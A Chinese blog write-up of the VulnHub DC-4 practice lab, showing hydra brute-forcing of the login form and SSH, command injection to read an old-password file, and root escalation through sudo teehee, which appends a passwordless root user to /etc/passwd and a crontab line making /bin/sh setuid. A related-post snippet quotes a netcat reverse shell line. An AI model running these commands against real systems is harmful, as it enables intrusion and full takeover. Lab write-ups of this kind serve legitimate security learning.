vulnhub 入门DC-4

已于 2023-01-01 07:43:02 修改
阅读量209 收藏
点赞数
分类专栏: vulnhub 文章标签: linux 网络安全 web安全
于 2023-01-01 07:39:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52780973/article/details/128510344
版权

nmap扫存活主机,192.168.254.132。扫端口服务

在这里插入图片描述

22端口ssh和80,访问80端口,一个管理员登录框

在这里插入图片描述

hydra爆破,用户名admin,登录成功的标志是有logout(burpsuite放大字典卡死,还是用hydra)

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.254.132 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"

在这里插入图片描述

在这里插入图片描述

有个执行命令的文件

在这里插入图片描述

抓包看看

在这里插入图片描述

可以修改命令,看看有哪些用户ls /home

在这里插入图片描述

ssh爆破失败。翻到旧密码文件

在这里插入图片描述

cat /home/jim/backups/old-passwords.bak

在这里插入图片描述

拿旧密码去爆破ssh

在这里插入图片描述

密码为jibril04。ssh连接
在这里插入图片描述

折腾了半天不知道怎么提权,后来才发现有一封mail(ssh连接的时候没注意看),真正的在var/mail/jim

在这里插入图片描述

得到密码^xHhA&hvim0y。切换到charles用户,登录成功。sudo -l看看(jim不能sudo
在这里插入图片描述

能以teehee命令提权。添加一个超级用户(在文件末尾添加)

sudo teehee -a /etc/passwd
pon::0:0:::/bin/bash

在这里插入图片描述

su pon切换到超级用户,得到root权限

在这里插入图片描述

借助teehee添加定时任务,提权

echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

每分钟以root用户的身份将/bin/sh的权限提升为4777。当一分钟过后,我们执行命令/bin/sh就可以得到root权限。

在这里插入图片描述
总结

1.hydra爆破登录框,联想登录成功有哪些特征字符串

2.一些意想不到的文件,比如旧密码

3.注意细节,ssh连接成功时收到邮件

4.teehee提权

---------------------------跨年是DC-3和DC-4陪的:)

p0n9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 328
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub-DC-4靶机实战
御七彩虹猫
04-07 2371
Vulnhub-DC-4靶机实战
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1057
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
VulnhubDC-2(新手入门
zhangshuaiijie的博客
06-12 132
这靶机有点难,每个用户的权限都不一样,rbash绕过,git提权。
vulnhub靶机之DC-4
m0_52328368的博客
08-19 1130
vulnhubdc-4详细步骤
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
Vulhub-DC-4靶场实战攻略
weixin_51339377的博客
03-16 1566
靶场DC-4和前面DC-1和2相同的网络配置 只有DC-3比较特别 需要重新调配相应的环境 arp-scan -l nmap -T4 -A 192.168.206.130 -p 1-65535 http://192.168.206.130 可以借助工具burpsuite进行暴力破解 由于非常智障 这里不多赘述 结果 用户名 admin 密码happy nc+192.168.206.128+9999+-e+/bin/bash nc -lvp 9999 ...
vulnhub靶场渗透之DC-4渗透教程(超级详细)
旺仔Sec&blog
06-05 718
靶机下载链接作者DCAU发布日期2019年4月7日难度中等1、第一点主要考察我们的信息手机,敏感文件的查看,一定要尝试多种思路2、多抓一下包看看包文有没有可用的信息3、最后就是sudo靶机的提权,vulnhub靶场蛮多sudo提权的,我相信这个靶机的做法应该也不止我这一种,也欢迎大家来尝试发现多种做法!
vulnhub-dc4
bqnagus
10-05 1158
vulnhub-dc4靶机复现
[Vulnhub] DC-4
weixin_63231007的博客
01-28 822
DC系列靶机-第四弹(hydra爆破密码+teehee命令提权)
Vulnhub靶机实战——DC-4
冠霖L的博客
09-27 3115
靶机DC-4下载地址:https://download.vulnhub.com/dc/DC-4.zip 描述:从靶机DC-3开始,只有一个入口和一个最终的flag,只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境:Vmware 15 Pro虚拟机软件 DC-4靶机IP地址:192.168.220.138 Kali的IP地址:...
Vulnhub靶机渗透测试实战(一):DC-1(入门
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
Vulnhub DC-4 teehee 提权
ST0new的博客
07-21 1617
VulnhubDC-4 本文只用于学习知识,不要将其用于非法途径, 前言 DC已经做了一半了,前三次都是基于初学者的,这次的难度就提升了,适合初学者和入门的伙伴。 还是按照常例看看作者是怎么描述的吧。 下载地址 DC-4 描述 DC-4是另一个专门建造的脆弱实验室,目的是获得渗透测试领域的经验。 ​ 与以前的DC版本不同,这个版本主要是为初学者/中间用户设计的。只有一面旗帜,但技术上来说,有...
Vulnhub系列之DC4靶场详解
weixin_50053818的博客
05-09 822
@ [TOC] 环境 vulhub系列之DC4靶场 VMware虚拟机 kali 爆破网站管理员用户拿shell 由目标靶机的Mac地址可以得出靶机IP为`192.168.43.140`.nmap扫描结果得知目标靶机开放了80端口和22端口,所以只能从目标网站下手。直接进入网首页。 根据首页信息可以知道,有admin用户,所以直接用burpsuite爆破,用软件自带密码即可。 爆破成功,密码是happy。登陆进去发现是命令执行,所以直接抓包改数据,反弹shell。 反弹shell成功,是用n
VulnHub DC: 4
spider的博客
12-01 229
下载地址 https://download.vulnhub.com/dc/DC-4.zip 从nmap 入手(靶机在192.168.1.106) nmap -sT -sV -sC 192.168.1.106 -O -p- 开放了80,22端口。 先上个80看看 只有一个登陆界面,尝试在username输入’or’1’='1 看看有没有sql注入。重定向回本页面。 ...
三电系统维修手册.pptx
04-05
"三电系统维修手册是专为JAC-4车型设计的详细指南,涵盖了电池系统及其相关的维修保养内容。该手册主要针对高压系统的八大部分进行讲解,包括: 1. DC-DC转换器维修:DC-DC转换器负责将电池包的320V直流电压转化为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值